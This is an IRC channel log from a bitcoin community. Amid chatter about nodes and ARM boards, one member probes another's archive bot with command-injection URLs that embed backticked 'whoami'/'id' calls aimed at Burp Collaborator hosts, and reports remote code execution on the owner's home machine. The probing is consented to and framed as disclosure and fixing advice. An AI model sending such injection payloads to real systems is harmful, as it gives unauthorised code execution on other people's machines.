1792322;1522773380;BingoBoingo;roughly convenience stores. The servicios tend to have better sandwiches 1792323;1522773569;ben_vulpes;!!v A4C82702BD7A91BE63B8838DB2164C2B2BC39E9F99B411FB0EEDB8D2192D1F3F 1792324;1522773569;deedbot;ben_vulpes unrated shinohai. 1792325;1522773826;BingoBoingo;douchebag: When are some Qntra submissions incoming? 1792326;1522773866;douchebag;I can have some ready tonight if you can link me to where qntra shares are traded 1792327;1522773892;douchebag;last time I tried looking there were so broken links 1792328;1522773920;ben_vulpes;http://logs.bvulpes.com/trilema?d=2018-4-3#324745 << you have it backwards; how i behave defines lordship and lo i got my way 1792329;1522773921;mimisbrunnr;Logged on 2018-04-03 15:20 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge? 1792330;1522773921;mimisbrunnr;Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai 1792331;1522774496;BingoBoingo;douchebag: On MPEx, there's proxy issues being sorted out. Sometimes the proxies run away and MP has to chain them back to his Ex 1792332;1522774648;BingoBoingo;In other news, the nose is mostly under control. South American cold still has my energy rather zapped. The Incan nurse however did apologize last night. 1792333;1522774688;asciilifeform;hey BingoBoingo , possibly i already asked this a while back and then lost -- but plox to gpg me a postage addr where you can get mail. i want to try experiment. 1792334;1522775035;ben_vulpes;hola mircea_popescu 1792335;1522775073;BingoBoingo;asciilifeform: http://p.bvulpes.com/pastes/Yvat8/?raw=true 1792336;1522775079;asciilifeform;danke BingoBoingo 1792337;1522775109;BingoBoingo;asciilifeform: Remember, nothing of incredible value. I am still awaiting a birthday card from February. 1792338;1522775154;mircea_popescu;heya! 1792339;1522775162;BingoBoingo;Buenas Tardes 1792340;1522775172;asciilifeform;and yes BingoBoingo i did think of the item you mentioned, and already prepared it, it ought to satisfy 1792341;1522775179;asciilifeform;ohai mircea_popescu 1792342;1522775199;trinque;douchebag: consider that if you figure out which box responded to you, you at the very least can improve some Lord's bot for him, maybe lobbes' archivebot slurped it? At best, (if it was done in PM), you've got something else listening in, slurping things up. 1792343;1522775224;trinque;that latter would be a mighty interesting blog post 1792344;1522775277;BingoBoingo;trinque: Remember the "Reddit Police" DDoS bot? 1792345;1522775289;trinque;naw 1792346;1522775315;BingoBoingo;That was 2014-ish 1792347;1522775335;BingoBoingo;Roughly coincided with the GAW miners drama. 1792348;1522775341;mircea_popescu;http://btcbase.org/log/2018-04-03#1792252 << lol wait, is he on the list of pizarro victims, with thewhet, minigame an' so on ? or what dramas am i missing here ? 1792349;1522775341;a111;Logged on 2018-04-03 12:30 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324610 <<< I'm sorry, been working on my new book "How to set chmod permissions in under 1 minute so users can log into their shell, and other things isp ops should know!" .... but I'll look into that as time permits. 1792350;1522775341;mimisbrunnr;Logged on 2018-04-03 07:28 ben_vulpes: !!v 6214E787A837E6749DEE8709D2234A274FC8637BF1975414A17E6750FA2FAC26 1792351;1522775371;mircea_popescu;BingoBoingo i remember a "bitcoin police" lol ? 1792352;1522775403;mircea_popescu;(they, self-importantly, didn't want to give self up to #b-a, because of course http://trilema.com/and-in-todays-lulz-the-obnoxious-cocksucker ) 1792353;1522775406;BingoBoingo;mircea_popescu: Maybe that's what it was. 1792354;1522775443;mircea_popescu;http://btcbase.org/log/2018-04-03#1792250 << iirc they were compiled once a day. 1792355;1522775443;a111;Logged on 2018-04-03 12:29 shinohai: Also, trinque is your www of wot not updating at this time? 1792356;1522775522;trinque;correct, cronulated 1792357;1522775523;ben_vulpes;http://logs.bvulpes.com/trilema?d=2018-4-3#324705 << do you not have a machine capable of building trb? 1792358;1522775525;mimisbrunnr;Logged on 2018-04-03 14:25 douchebag: Hey, would you guys be able to show me up a pizarro shell for trb? 1792359;1522775579;douchebag;My machines are capable but if I'm going to be running a node, it would probably be best to have a dedicated VPS to do so 1792360;1522775594;mircea_popescu;douchebag generally it runs on actual dedicated machines, rather than vps. 1792361;1522775605;mircea_popescu;http://btcbase.org/log/2018-04-03#1792263 << it's all random numbers anyways. 1792362;1522775605;a111;Logged on 2018-04-03 12:51 mod6: meanwhile, we should probably replace that bot functionality asap. we need a way to get VWAP recorded in here daily. 1792363;1522775642;douchebag;Ahh okay 1792364;1522775670;BingoBoingo;douchebag: The added value in running more nodes is generally spreading the network geographically, etc. There's little value in adding yet another nominal node to the same box or AWS freakshow 1792365;1522775677;mircea_popescu;http://btcbase.org/log/2018-04-03#1792259 << did this ever come to anything then ?! 1792366;1522775677;a111;Logged on 2018-04-03 12:39 douchebag: the IP address begins with 174.108 1792367;1522775686;mircea_popescu;douchebag dood is building the UCI before we even have it lmao. 1792368;1522775727;douchebag;UCI? 1792369;1522775746;mircea_popescu;!#s UCI 1792370;1522775747;a111;189 results for "UCI", http://btcbase.org/log-search?q=UCI 1792371;1522775751;mircea_popescu;"universal computing interface" 1792372;1522775773;douchebag;ahh 1792373;1522775794;*;trinque put a rather beefy node in the pizarro rack at 1792374;1522775814;trinque;376103 and counting 1792375;1522775817;douchebag;Oh also 1792376;1522775828;mircea_popescu;asciilifeform the pic shows that he got "something" to load a file from his filehost. supports the theory that has rce, if he can run wget he can run plenty. 1792377;1522775834;douchebag;When I geoip'd that IP adddress 1792378;1522775856;mircea_popescu;(consider, the way linux works today, if i can run wget as a user i can take the box, the memory leaks.) 1792379;1522775902;asciilifeform;nobody seems to know who or what ran the wget 1792380;1522775925;mircea_popescu;wget WILL time the netcard for you, the netcard has dma, that's the wholew story. 1792381;1522775933;mircea_popescu;asciilifeform well, some ip apparently. i dunno, going through teh logs. 1792382;1522775998;asciilifeform;asciilifeform's observation was that every idjit crapartist probing an asciilifeform-tended box , ever, without exception thought 'ooh, my wget ran' when asciilifeform reads log , and then , on specially-designated box, manually probes back & grabs payload 1792383;1522776033;asciilifeform;... but in this case, wasn't mine. and, interestingly, apparently not trinque either 1792384;1522776085;mircea_popescu;this is a theory we can easily verify. douchebag write f2c26beed4 on the boxes' tits or something. can you get it reliably ? 1792385;1522776116;mircea_popescu;not entirely intractable to discern whether human is involved or not. 1792386;1522776126;asciilifeform;aha, supposing replicable 1792387;1522776135;mircea_popescu;time will tell you everything. 1792388;1522776144;douchebag;I need to get the boxes full IP 1792389;1522776146;douchebag;sec 1792390;1522776179;douchebag;Actually, I exited out of that - I'm able to retrieve it but I need to know the proper request to send. waiting on a response from that right now 1792391;1522776199;deedbot;http://trilema.com/2018/dangerous/ << Trilema - Dangerous 1792392;1522776214;mircea_popescu;the proper who ? 1792393;1522776226;mircea_popescu;douchebag do you use screen, incidentally ? 1792394;1522776238;douchebag;yes 1792395;1522776242;mircea_popescu;a ok then. 1792396;1522776258;douchebag;I did do a reverse search on that IP address though 1792397;1522776267;douchebag;It seemed to be out of North Carolina if I remember correctly 1792398;1522776297;*;lobbes is slowly assembling parts for his own home trb node. Waiting on replacement cpu fan to come in atm. Updates to follow! 1792399;1522776299;douchebag; 1792400;1522776304;douchebag;^ Full IP 1792401;1522776314;*;mircea_popescu has noticed over the years that the usage of screen is a sort of pons asinorum in computer usage. like the oil rag cloth in a car distinguishes pisi tourist from the driver who actually maintains the machinery ; or like condoms on the nightstand distinguish the woman from the girl and so on. 1792402;1522776350;lobbes;Re: douchebag's recent wget payload: I can confirm that it most likely wasn't my archivebot. The bot doesn't download links directly, it stores list of urls found in chan and forwards them to the archive.is submit form 1792403;1522776396;mircea_popescu;http://btcbase.org/log/2018-04-03#1792286 << i very well fucking don't. jesus christ, 1mn+ lines/day, god help me. i catgrep the item now and again, but the odds of me noticing something in there are pretty slim. 1792404;1522776396;a111;Logged on 2018-04-03 15:07 asciilifeform: this is possibly foreign concept in 'web' world, but over here in the adult world people , for instance, read logs. every day. 1792405;1522776416;asciilifeform;y'know it's still 'read' if you put it through meatgrinder 1792406;1522776439;mircea_popescu;but very distantly read. it's a perl meatgrinder, i'm sure it misses most of the meat. 1792407;1522776458;mircea_popescu;douchebag looks like a home ip. \ 1792408;1522776515;mircea_popescu;vulnerable home computers are pestilentially common ; did you get to the portion in the logs where we logged into a shitton of servers administering solar panels ? 1792409;1522776643;mircea_popescu;http://btcbase.org/log/2018-04-03#1792296 << oh don't be silly. i now concur with alf, this is no indication of anything yet. get it to do it systematically, in reaction to something you control, THEN you have maybe something. 1792410;1522776643;a111;Logged on 2018-04-03 15:24 douchebag: no clue, I just checked the logs and saw that lolz.txt was grabbed via wget 1792411;1522776782;mircea_popescu;http://btcbase.org/log/2018-04-03#1792298 << what do these two have to do with each other anyway. there should be a difference between doing wrong and not doing enough. not every burgher can be in the town council, that dun mean he's bankrupt now or something, what the hell. 1792412;1522776782;a111;Logged on 2018-04-03 15:29 shinohai: http://logs.bvulpes.com/trilema?d=2018-4-3#324728 << one could also behave a bit more becoming of a "Lord" and wait until official defrocking occurs before leading the negrate charge? 1792413;1522776782;mimisbrunnr;Logged on 2018-04-03 15:01 asciilifeform: http://btcbase.org/log/2018-04-03#1792252 << there is still time to turn back from nubbinsing, shinohai 1792414;1522776800;douchebag;It it okay if I test this payload again right now 1792415;1522776805;douchebag;To see if I get another pingback 1792416;1522776844;mircea_popescu;i don't see why not. 1792417;1522776876;BingoBoingo;Best case it's just the FBI and they are too busy chasing imaginary Russians to notice you walking away with their server 1792418;1522776876;douchebag;Alright, give me a moment I just didn't want to bother anyone with my payloads 1792419;1522777203;lobbes;douchebag aha I think that is my home ip. Plox do test payload again 1792420;1522777246;douchebag;Oh shit, and you never manually ran wget on that IP 1792421;1522777248;douchebag;???? 1792422;1522777261;douchebag;or on the link??? 1792423;1522777279;lobbes;Actually, when was this? I think I may hace manually wgot 1792424;1522777285;lobbes;*have 1792425;1522777289;douchebag;last night 1792426;1522777291;douchebag;vjiayxgdlqk1veovjxso63g6ixopce.burpcollaborator.net 1792427;1522777295;douchebag;on something that looked like that 1792428;1522777332;lobbes;Hmm interesting. Yeah this was a few weeks ago iirc when I curiously grabbed one of yer payloads via wget 1792429;1522777341;douchebag;yeah no dude 1792430;1522777345;douchebag;If you didn't do this last night 1792431;1522777350;douchebag;I got remote code execution on your box 1792432;1522777371;douchebag;Can you send me links to the scripts ? 1792433;1522777376;douchebag;I'll show you how to fix it 1792434;1522777393;lobbes;Also not 100% positive if that was my home ip, but charlotte nc is my residence. I'll confirm that tonight 1792435;1522777432;douchebag;So lobbes 1792436;1522777446;douchebag;Are any of these things being manually passed into bash commands 1792437;1522777535;douchebag;here lets see something 1792438;1522777546;douchebag;http://6w3lb8toy1xc8p16w85zjethv814pt.burpcollaborator.net/`whoami` 1792439;1522777584;douchebag;lobbes: How often does the bot search ? 1792440;1522777716;douchebag;http://3nri25klpyo9zms3n5wwabkem5s2gr.burpcollaborator.net/$(whoami) 1792441;1522777806;lobbes;the bot operates from an external vps (not my home ip). Shoves urls into a db which my home box downloads and then passes eaxh one to archive.is. 1792442;1522777844;douchebag;and how are you passing these to archive.is 1792443;1522777939;lobbes;That is done through a process where a python script reads from (ahhh now I think I see where it may remotely execute) db and passes url via bash to a phantomjs script which submits to archive.is 1792444;1522777960;douchebag;Hahaha 1792445;1522777963;douchebag;Awesome 1792446;1522777966;douchebag;Well for me at least 1792447;1522777974;douchebag;For you, I really do suggest fixing that 1792448;1522777976;lobbes;I'll dig more into it tonight once I'm in front of it all 1792449;1522777990;douchebag;Because if I was a blackhat I could have pwned ur home box 1792450;1522778013;lobbes;Yeah really. Thank you for uncovering this (I am n00b, you will soon learn) 1792451;1522778047;douchebag;No problem man, just glad I could help! 1792452;1522778069;lobbes;Likewise, I'll give ya a favorable rating once in front of my gpg key 1792453;1522778083;douchebag;Sounds like a plan 1792454;1522778276;trinque;wd douchebag 1792455;1522778311;douchebag;thx <3 1792456;1522778466;mircea_popescu;lobbes fwiw this is very poor design. 1792457;1522778520;lobbes;Oya. Hey, this is the peril of "learning as you go" 1792458;1522778561;lobbes;What would you suggest as a better design? Obvs no passing urls via bash 1792459;1522778590;mircea_popescu;why is your home box doing work that's not directed at you ? 1792460;1522778636;mircea_popescu;conceptually, if it's talking to you it's an infangwif ; if it's talking to the outside it's an outsidewif. why are you fucking streetwalkers / sending the wife to walk the streets ? 1792461;1522778678;mircea_popescu;when you say "home box", what do you even mean ? 1792462;1522778729;douchebag;lobbes: If you want to make a secure application, consider all user input as malicious 1792463;1522778750;douchebag;lobbes 1792464;1522778754;douchebag;Your home machines name is lobbes 1792465;1522778756;douchebag;correct? 1792466;1522778763;lobbes;mircea_popescu: the logs, but it is an old craptop with an ssd dedicated to public toilet Only place I had to store the gbs of archive data. 1792467;1522778779;lobbes;douchebag si 1792468;1522778784;douchebag;Yep 1792469;1522778786;douchebag;https://i.imgur.com/Wwrp9VP.png 1792470;1522778791;douchebag;RCE confirmed 1792471;1522778832;mircea_popescu;lobbes well fine, but i was discussing teh design as such. there's no rule against "i have a crappy box for a server that's not worth placing in a dc so it sits in garage", sure. nor is there any rule against "i just simplified speech, called it homebox, it's not" -- but what you say is all i have to go on, that's all. 1792472;1522778886;mircea_popescu;douchebag umm, you used his ~browser~ to do this ?! 1792473;1522778919;douchebag;I think it's being passed into bash into a PhantomJS interpreter 1792474;1522778934;lobbes;^^ 1792475;1522778940;mircea_popescu;oh. 1792476;1522778960;mircea_popescu;nifty. 1792477;1522778963;lobbes;Man I feel stupid in general 1792478;1522778970;mircea_popescu;!!rated douchebag 1792479;1522778971;deedbot;mircea_popescu rated douchebag 1 at 2018/01/15 07:34:46 << hyde.solutions 1792480;1522778994;mircea_popescu;!!rate douchebag 2 "your home machine's name is lobbes" 1792481;1522778997;deedbot;Get your OTP: http://p.bvulpes.com/pastes/Nn9Ye/?raw=true 1792482;1522779070;douchebag;lobbes: Just make sure whenever you handle any user input, consider all input as potentially malicious 1792483;1522779077;mircea_popescu;ben_vulpes i wasn't initially going to say anything besides "nay" ; but hey, pizarro's a friend of ours, so : nsa would sell the spare machine for cost, which is about .371. comes with two fgs installed and free shipping. 1792484;1522779089;douchebag;and for fucks sake do not pass any user input into a bash interpreter 1792485;1522779147;lobbes;douchebag really though, this has been a wake up call to get my shit together. Ty again 1792486;1522779184;douchebag;Yeah no problem, it was pretty fun to discover 1792487;1522779196;mircea_popescu;!!v 86FC0A4A826976505E6815A4D3677651F10E73948ED9B253C022B65F6C2DFB4E 1792488;1522779196;deedbot;mircea_popescu updated rating of douchebag from 1 to 2 << "your home machine's name is lobbes" 1792489;1522779210;lobbes;Just know, I'm prolly the easiest target here :P 1792490;1522779238;mircea_popescu;i'm not so certain. 1792491;1522779279;douchebag;http://f0gufhxx2a1lcy5f0h98nnxqzh5ht6.burpcollaborator.net/`id` 1792492;1522779397;mircea_popescu;https://portswigger.net/burp/help/collaborator << that burp thing's not even retarded. runs a dummy server on the side, ns, everything. 1792493;1522779412;mircea_popescu;douchebag do you know who made it ? 1792494;1522779437;douchebag;It's made by a team of people 1792495;1522779456;douchebag;It was originally developed by dafydd portswigger 1792496;1522779463;mircea_popescu;right. 1792497;1522779468;douchebag;now he has a couple other people working on it, I know ones name is James Kettle 1792498;1522779486;mircea_popescu;did you spring for teh $350 a year thing ? 1792499;1522779496;douchebag;Yeah, well worth it 1792500;1522779520;mircea_popescu;i believe. 1792501;1522779594;douchebag;mircea_popescu: I got 0.01 for perma voice, do I get 0.02 for Remote Command Execution :-D ? 1792502;1522779616;mircea_popescu;lol. i was going to buy you the pro yearly package, actually. but since you already have it, no need :D 1792503;1522779647;douchebag;I appreciate that, feel free to reimburse it though haha 1792504;1522779727;douchebag;Man I lol 1792505;1522779738;lobbes;Anyways, archivetron's url snarf has been temporarily disabled for obvious reasons. Will resume once I plug these holes tonight 1792506;1522779750;lobbes;I'll announce once back up 1792507;1522779750;douchebag;I bet so many bots could be pwned with similar techniques 1792508;1522779781;mircea_popescu;douchebag i'll get you a sever once the pizarro folk unwrap their heads enough to actually have one on offer. so you can tinker on gentoo, trb etc and get out of the "vps" bs hell. 1792509;1522779812;douchebag;A physical serve ?! 1792510;1522779817;douchebag;server* 1792511;1522779831;asciilifeform;hey maybe he will be the test patient for the new arm boxen. 1792512;1522779857;mircea_popescu;douchebag yeah. 1792513;1522779866;mircea_popescu;asciilifeform i dunno he can arm... one thing at a time. 1792514;1522779871;douchebag;Holy shit thanks!! 1792515;1522779909;mircea_popescu;yeah, tell you what, i'll be as happy as you are once it's finally done. 1792516;1522779915;asciilifeform;mircea_popescu: if all he needs is standard unix userland, no reason he couldn't arm. 1792517;1522779943;mircea_popescu;what was on those, i forget ? 1792518;1522779957;asciilifeform;the arm gentoo i am cooking up as we speak. 1792519;1522779965;mircea_popescu;i meant hardware 1792520;1522779988;douchebag;Well, I'm gonna grab a cigarette to aid with this excitement 1792521;1522780034;asciilifeform;ROC-RK3328-CC ( currently building a kernel for it, without the 'evil' periphs ) 1792522;1522780041;asciilifeform;chinese thing, they publish schematic , even. 1792523;1522780052;mircea_popescu;but ram hdd etc ? 1792524;1522780091;asciilifeform;the unit i am testing ( will buy a few moar once i'm satisfied that it is usable ) came with 2G. there is a 4G supposedly also in production, but i was not able to obtain it 1792525;1522780115;asciilifeform;hdd is a highspeed SD card , and can be of any size ; there is also a usb3 jack, 480MB/s; and a 1G/s nic. 1792526;1522780135;mircea_popescu;ah so could actually run trb np 1792527;1522780141;asciilifeform;indeed it could 1792528;1522780156;asciilifeform;faster, in principle, even than zoolag 1792529;1522780183;mircea_popescu;this is neat. ok, chuck the largest sd you can find in there an' consider it sold. 1792530;1522780218;asciilifeform;first things first, gotta terraform it. 1792531;1522780241;mircea_popescu;yeah. 1792532;1522780257;asciilifeform;then will simply clone the gentoo for each new user ( or he can transmit a SD image , signed , and BingoBoingo will pump it in, plug in a board, and up an' running ) 1792533;1522780276;mircea_popescu;douchebag alf lands in the oriental republic sometime mid month ; you'll get your login then, an' your first task will be to get trb up on it ; and the tasks 2 throught 999 will be to have fun. 1792534;1522780283;mircea_popescu;so clear your schedule 2nd half of april for it. 1792535;1522780296;mircea_popescu;asciilifeform i like the model. 1792536;1522780330;asciilifeform;the interesting bit is that these boxen draw ~2 - 5 watt. and are of the physical dimensions of a pack of cards. 1792537;1522780350;asciilifeform;and (unlike e.g. 'raspberry') the full datashits and schems are published. 1792538;1522780365;asciilifeform;chipset is a 'rockchip', i ported trb to it in 2015 iirc. 1792539;1522780373;asciilifeform;(trb, buildroot-kernel, userlands) 1792540;1522780411;asciilifeform;the other interesting pheature of this board is that it has no onboard flash. so nothing to sanitize aside from sdcard. 1792541;1522780455;asciilifeform;( also comes with audio and video but i do not need these and have not tried'em ) 1792542;1522780524;mircea_popescu;http://btcbase.org/log/2018-04-03#1792306 << ahahaha 1792543;1522780524;a111;Logged on 2018-04-03 15:33 douchebag: ie: !!send $(wget http://site.com/lolz.txt) 1792544;1522780604;mircea_popescu;http://btcbase.org/log/2018-04-03#1792317 << well conceivably for the same reason alf isn't bringing back phuctor, neh. cuz he doesn't as of yet have where to bring it back from! 1792545;1522780604;a111;Logged on 2018-04-03 15:38 trinque: instead of whining about it, why not bring back said bot 1792546;1522780666;mircea_popescu;http://btcbase.org/log/2018-04-03#1792321 << sounds like local knockoff. this thing only exists in cr, some local entrepreneur (in the proper sense of the term) made a supermarket that actually works. 1792547;1522780666;a111;Logged on 2018-04-03 16:36 BingoBoingo: so this upscale local market ("automercado") that stocks all the shit i buy and consequently got a multi-mn monthly account came up with the very dubious idea of running a promotion. one of those things where you get stickers with your receipt and then you fill a book ? in the terms of the master provisioneer, "they'll rue the day!". i think she's got like twenty of the things all lined up. << Here "automercados" are 1792548;1522780702;mircea_popescu;http://btcbase.org/log/2018-04-03#1792327 << yeah, bringing mpex proxies back up is underway. 1792549;1522780702;a111;Logged on 2018-04-03 16:44 douchebag: last time I tried looking there were so broken links 1792550;1522780729;trinque;general point of "nobody wants your head bud, just move in a direction". I guess he had a health problem, which is rough. 1792551;1522780731;lobbes;To wrap back to this discussion, I think I see your point. There's no real reason this craptop needs to deal with the user input at all. All I need it for is to download, store and parse shit download from archive.is. >> http://btcbase.org/log/2018-04-03#17924 1792552;1522780731;a111;Logged on 2013-05-06 02:54 tiberiusiv: miami is not like NYC lol 1792553;1522780738;mircea_popescu;http://btcbase.org/log/2018-04-03#1792332 << with both mouths, one would hope. 1792554;1522780738;a111;Logged on 2018-04-03 16:57 BingoBoingo: In other news, the nose is mostly under control. South American cold still has my energy rather zapped. The Incan nurse however did apologize last night. 1792555;1522780773;asciilifeform;mircea_popescu: s/meet/meat/g in footnote ii in yer latest article 1792556;1522780793;mircea_popescu;lobbes the only important consideration here is that design is not a haphazard activity driven by occurence and circumstance. that's implementation. design is a deductive activity, it proceeds from first principles and does not break faith. 1792557;1522780797;lobbes;Wat a111 misquote? 1792558;1522780820;mircea_popescu;asciilifeform ty 1792559;1522780823;lobbes;mircea_popescu makes sense 1792560;1522780841;mircea_popescu;lobbes you lopped off a digit from the url ; it goes by #17924 1792561;1522780860;lobbes;Ahh that's what happened 1792562;1522780878;mircea_popescu;asciilifeform you know, your page is stale. it was already fixed in the latest version! 1792563;1522780883;BingoBoingo;http://btcbase.org/log/2018-04-03#1792546 << Here it isn't a singluar entity running them. It's what they call gas stations without the gas pumps. 1792564;1522780883;a111;Logged on 2018-04-03 18:37 mircea_popescu: http://btcbase.org/log/2018-04-03#1792321 << sounds like local knockoff. this thing only exists in cr, some local entrepreneur (in the proper sense of the term) made a supermarket that actually works. 1792565;1522780959;douchebag;sounds good 1792566;1522780970;mircea_popescu;BingoBoingo http://arc-anglerfish-arc2-prod-gruponacion.s3.amazonaws.com/public/24AKIANLPZAPNEEN7R4CXKBQIQ.jpg << looks like that ? 1792567;1522780975;BingoBoingo;http://btcbase.org/log/2018-04-03#1792553 << Naturally and unnaturally. 1792568;1522780975;a111;Logged on 2018-04-03 18:38 mircea_popescu: http://btcbase.org/log/2018-04-03#1792332 << with both mouths, one would hope. 1792569;1522780994;BingoBoingo;!!up yangwao 1792570;1522780994;deedbot;yangwao voiced for 30 minutes. 1792571;1522781004;BingoBoingo;!!up yangwao_ 1792572;1522781004;deedbot;yangwao_ voiced for 30 minutes. 1792573;1522781016;BingoBoingo;yangwao_: Who is your daddy and what does he do? 1792574;1522781019;lobbes;mircea_popescu: But yeah, I need to think through my designs a bit better. Problem is I'm probably missing some crucial first principles. 1792575;1522781050;mircea_popescu;lobbes on the positive side, this is how they were born in the first place, by people thinking about it. no revelation under the sun. 1792576;1522781070;BingoBoingo;mircea_popescu: Yeah, the Ururuayan things with that string on their signage don't look like that. 1792577;1522781072;lobbes;Perhaps I ought to go through all my existing designs, map them out, and then blog post em for forum critique. 1792578;1522781099;mircea_popescu;lobbes can't hurt anything. 1792579;1522781169;lobbes;True dat. Anyways I'll bbl. Thanks for allowing me to brain pick 1792580;1522781259;mircea_popescu;http://btcbase.org/log/2018-04-03#1792337 << was that fedex'd ? 1792581;1522781259;a111;Logged on 2018-04-03 17:05 BingoBoingo: asciilifeform: Remember, nothing of incredible value. I am still awaiting a birthday card from February. 1792582;1522781295;BingoBoingo;mircea_popescu: Sent US mail, with "International Stamp" per the sender's description 1792583;1522781305;mircea_popescu;worth trying a fedex type thing 1792584;1522781320;BingoBoingo;Yeah 1792585;1522781345;douchebag;later lobbes 1792586;1522781445;asciilifeform;BingoBoingo, mircea_popescu : i learned today, that even shitazon ~will~ ship to BingoBoingoistan, BUT demands about 1 $ to every $ of item ordered , in 'import duty prepay' 1792587;1522781601;douchebag;Do you guys know the specs of the server ? 1792588;1522781632;ben_vulpes;mircea_popescu: is that free shipping to .uy? 1792589;1522782047;asciilifeform;unfree 1792590;1522782054;asciilifeform;(~on top of~ shipping) 1792591;1522782243;deedbot;http://qntra.net/2018/04/venezuelas-education-minister-eat-less-if-you-want-to-see-food-in-supermarkets/ << Qntra - Venezuela's Education Minister: Eat Less If You Want To See Food In Supermarkets 1792592;1522782246;mircea_popescu;ben_vulpes well yes. 1792593;1522782268;mircea_popescu;douchebag it's above, http://btcbase.org/log/2018-04-03#1792521 1792594;1522782268;a111;Logged on 2018-04-03 18:27 asciilifeform: ROC-RK3328-CC ( currently building a kernel for it, without the 'evil' periphs ) 1792595;1522782287;mircea_popescu;asciilifeform he was asking me not you lol. 1792596;1522782294;asciilifeform;aaa 1792597;1522782310;*;asciilifeform thought q was re shitazon-to-uy 1792598;1522782885;douchebag;How would this compare to a raspberry pi ? 1792599;1522782909;asciilifeform;douchebag: similar, but without the closed shitware iron 1792600;1522782923;douchebag;Forsure 1792601;1522783103;mircea_popescu;douchebag it's basically a very fast i/o low cpu power box. 1792602;1522783123;asciilifeform;not even so low -- 4 x 1.4GHz 64bit 1792603;1522783153;mircea_popescu;the republic's de facto moving towards hardware specialization, there's on one hand the very heavy cpu machines (of which sha miners are a subset, phuctor is another, and so on), and then the sort of thing like this, typified by a trb node machine. 1792604;1522783164;mircea_popescu;asciilifeform yeah. 1792605;1522783191;douchebag;Ooh interesting 1792606;1522783217;douchebag;hahaha 1792607;1522783219;douchebag;this is hilarious 1792608;1522783221;douchebag;https://i.imgur.com/S18PzjG.png 1792609;1522783224;douchebag;Just saw this come in 1792610;1522783227;mircea_popescu;as you don't do a lot of numbers churning, it might be tghe perfect item for you. and if not, well, we see. 1792611;1522783302;douchebag;Awesome 1792612;1522783443;spyked;re arm box, /me was considering buying the arm64 olinuxino from teh olimex people. the rockchip board seems very similar (++ on the USB3 port), but I can't seem to find it in the EU. 1792613;1522783508;asciilifeform;spyked: olimex lives in eu 1792614;1522783518;BingoBoingo;douchebag: If you keep impressing and outgrow the ARM thing, there are worse places to vacation after dropping off a box than Uruguay. The best weather here runs December to February though. 1792615;1522783543;mod6;iirc this dude would be coming out of eastern europe. 1792616;1522783553;mod6;instead of the united retards 1792617;1522783627;spyked;asciilifeform yeah I was talking about the ROC-RK3328-CC. it seems a tad beefier than the olimex counterpart. but otherwise yeah, olimex live very close to me, had a board delivered in ~2 days some months ago. 1792618;1522783662;asciilifeform;funnily enuff , it takes typically 3d to usa ! 1792619;1522783666;asciilifeform;( from bulgaria ) 1792620;1522783679;*;asciilifeform buys fairly often from olimex 1792621;1522783694;mircea_popescu;spyked so you can get one from teh pizarro too! 1792622;1522783770;mircea_popescu;mod6 wasn't he in chicago ? 1792623;1522783827;BingoBoingo;Fucking Yankee from upstate 1792624;1522783843;mod6;mircea_popescu: aha, iirc he said he's moving tho 1792625;1522783850;douchebag;I will be in the United States in april 1792626;1522783852;mircea_popescu;he is better than you rural hicks from southern ill! 1792627;1522783870;douchebag;I'm leaving for eastern europe late may 1792628;1522783870;mod6;douchebag: ah just through april tho? 1792629;1522783877;mod6;ah, alright. will keep that in mind. 1792630;1522783895;spyked;mircea_popescu: yeh I'm definitely considering that! the reason I've postponed getting an ARM board at all was the lack of a full-fledged SATA 3 port. I wanna get trb running on arm at some point among others. 1792631;1522783908;mircea_popescu;missoury dunno even what chic is, while chicago had it long ago! 1792632;1522783916;BingoBoingo; he is better than you rural hicks from southern ill! << This is true. At his age I was solidly anti-productive. 1792633;1522783931;mircea_popescu;spyked as described this item would actually make a great node ; whether the practice holds is to be seen in practice. 1792634;1522783974;spyked;also, as a fun-fact: I tried running lispbots on an old first-gen raspberry pi, but it seems SBCL doesn't support threading on ARM (at least not ARMv6 and ARMv7). so I want to test that on ARM64. 1792635;1522784011;asciilifeform;spyked: i found 1st gen raspi (entirely aside the q of closed shitware) to be ~unusable -- it shared a usb bus between nic (already slow) and disk 1792636;1522784029;douchebag;Oh but yeah, until then - let me know if there are any IRC bots or web applications you want me to take a look at 1792637;1522784101;spyked;eh, I ended up using it to host my IRC bouncer. at least it's good enough for that. 1792638;1522784228;phf;spyked: i prefer ccl on low powered machines, the only parts of trinque's bot that rely on sbcl are one or two functions related to thread management 1792639;1522784260;mircea_popescu;phf still though, losing out on threading on a quad machine is a little dumb. 1792640;1522784292;phf;oh, right, that wasn't obvious from what i said, ccl supports multithreading on arms 1792641;1522784302;mircea_popescu;a it does ? 1792642;1522784303;spyked;oh cool 1792643;1522784323;mircea_popescu;i suppose the question of lisp standardization, soon to be visited upon our fair republic, will be one helluva burning flame. 1792644;1522784326;phf;i believe rainer joswig hosts his websites on some arm box with CL-HTTP on top of it 1792645;1522784360;mircea_popescu;spyked a good move at this point i guess would be patching trinque 's bot to be all cll. 1792646;1522784463;mircea_popescu;speaking of pantsuit refraction lulz, https://news.ycombinator.com/item?id=587045 1792647;1522784467;ben_vulpes;mircea_popescu: thanks for extending the counteroffer, i'll take it. will you take payment in pizarro credits? 1792648;1522784498;mircea_popescu;oh, and : lobbes other than the design review, consider lifting the whole of gutenberg into your archive ? the idiots already have a https that is broken, so far http only works but who knows how long. 1792649;1522784558;mircea_popescu;ben_vulpes cash or bonds, though for the latter no actual discount was discussed in teh nsa boardroom. but i guess i'll go with .4 off the cuff and hope nobody throws gavels at me. 1792650;1522784666;*;trinque uses ccl elsewhere, would glady sign that patch 1792651;1522784693;ben_vulpes;mircea_popescu: works, i'll take it for bonds 1792652;1522784753;mircea_popescu;epic contributions from "paul nakata" (hey, nobody on a stick but has a keybase key), some dork who "programs in cl every day" and the whole menagerie of "nobody told us to shut the fuck up like, ever" 1792653;1522784766;mircea_popescu;ben_vulpes cool. that takes s.nsa pile to .9 if memory serves ? 1792654;1522784774;ben_vulpes;correct you are 1792655;1522784803;spyked;mircea_popescu, it's good timing, since I've been doing some reading ircbot code and comparing with my own implementation. I've actually been contemplating http://btcbase.org/log/2018-02-26#1786288 and rolling my own was not a wholly useless endeavour, i.e. http://trilema.com/2016/how-to-participate-in-the-affairs-of-the-most-serene-republic/#selection-322.0-322.5 so I'll document the whole thing on the blog. 